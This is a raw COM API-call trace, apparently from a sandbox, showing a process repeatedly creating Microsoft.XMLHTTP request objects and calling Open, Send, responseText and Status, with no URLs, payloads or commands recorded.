	[0728.373] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7878, pUnkSite=0x62f310) 
	[0728.373] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0728.374] XMLHTTPRequest:IUnknown:Release (This=0x49c7878) returned 0x0
	[0728.374] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5aa0) returned 0x0
	[0728.374] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5aa0) returned 0x3
	[0728.374] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0728.374] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5aa0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0728.376] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0728.377] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0728.377] SysStringLen (param_1=0x0) returned 0x0
	[0728.377] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0728.377] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0728.377] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5ba0) returned 0x0
	[0728.377] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0728.377] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5ba0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5c08) returned 0x0
	[0728.377] ??2@YAPEAX_K@Z () returned 0x62f330
	[0728.377] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5c08, pUnkSite=0x62f330) 
	[0728.377] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0728.377] XMLHTTPRequest:IUnknown:Release (This=0x49c5c08) returned 0x0
	[0728.377] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5ba0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5ba0) returned 0x0
	[0728.378] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5ba0) returned 0x3
	[0728.378] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5ba0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0728.378] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5ba0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0728.378] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5ba0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0728.378] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0728.378] SysStringLen (param_1=0x0) returned 0x0
	[0728.378] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0728.378] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0728.378] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7450) returned 0x0
	[0728.379] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0728.379] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5b58) returned 0x0
	[0728.379] ??2@YAPEAX_K@Z () returned 0x62f310
	[0728.379] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5b58, pUnkSite=0x62f310) 
	[0728.379] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0728.379] XMLHTTPRequest:IUnknown:Release (This=0x49c5b58) returned 0x0
	[0728.379] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7450) returned 0x0
	[0728.379] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7450) returned 0x3
	[0728.379] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0728.379] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7450, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0728.379] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0728.379] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0728.380] SysStringLen (param_1=0x0) returned 0x0
	[0728.380] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0728.380] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0728.380] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5aa0) returned 0x0
	[0728.380] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0728.380] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5c08) returned 0x0
	[0728.380] ??2@YAPEAX_K@Z () returned 0x62f330
	[0728.380] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5c08, pUnkSite=0x62f330) 
	[0728.380] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0728.380] XMLHTTPRequest:IUnknown:Release (This=0x49c5c08) returned 0x0
	[0728.380] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5aa0) returned 0x0
	[0728.380] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5aa0) returned 0x3
	[0728.380] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0728.381] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5aa0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0728.381] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0728.381] longjmp () 
	[0728.381] longjmp () 
	[0728.381] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0728.381] SysStringLen (param_1=0x0) returned 0x0
	[0728.381] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0728.381] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0728.381] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5b50) returned 0x0
	[0728.381] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0728.381] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5bb8) returned 0x0
	[0728.382] ??2@YAPEAX_K@Z () returned 0x62f310
	[0728.382] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5bb8, pUnkSite=0x62f310) 
	[0728.382] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0728.382] XMLHTTPRequest:IUnknown:Release (This=0x49c5bb8) returned 0x0
	[0728.382] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5b50) returned 0x0
	[0728.382] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5b50) returned 0x3
	[0728.382] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0728.382] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5b50, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0728.382] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0728.382] longjmp () 
	[0728.383] longjmp () 
	[0728.383] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0728.383] SysStringLen (param_1=0x0) returned 0x0
	[0728.383] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0728.383] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0728.383] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7450) returned 0x0
	[0728.383] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0728.383] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5c08) returned 0x0
	[0728.383] ??2@YAPEAX_K@Z () returned 0x62f330
	[0728.383] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5c08, pUnkSite=0x62f330) 
	[0728.383] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0728.384] XMLHTTPRequest:IUnknown:Release (This=0x49c5c08) returned 0x0
	[0728.384] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7450) returned 0x0
	[0728.384] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7450) returned 0x3
	[0728.384] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0728.384] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7450, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0728.384] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0728.384] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0728.384] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7450, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Send", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=5) returned 0x0
	[0728.384] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0728.884] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd48 | out: ppvObject=0x28dd48*=0x0) returned 0x80004002
	[0728.884] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7450, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28de60*="responseText", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc9c | out: rgDispId=0x28dc9c*=10) returned 0x0
	[0728.885] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0728.885] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0728.885] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7450, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0728.885] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
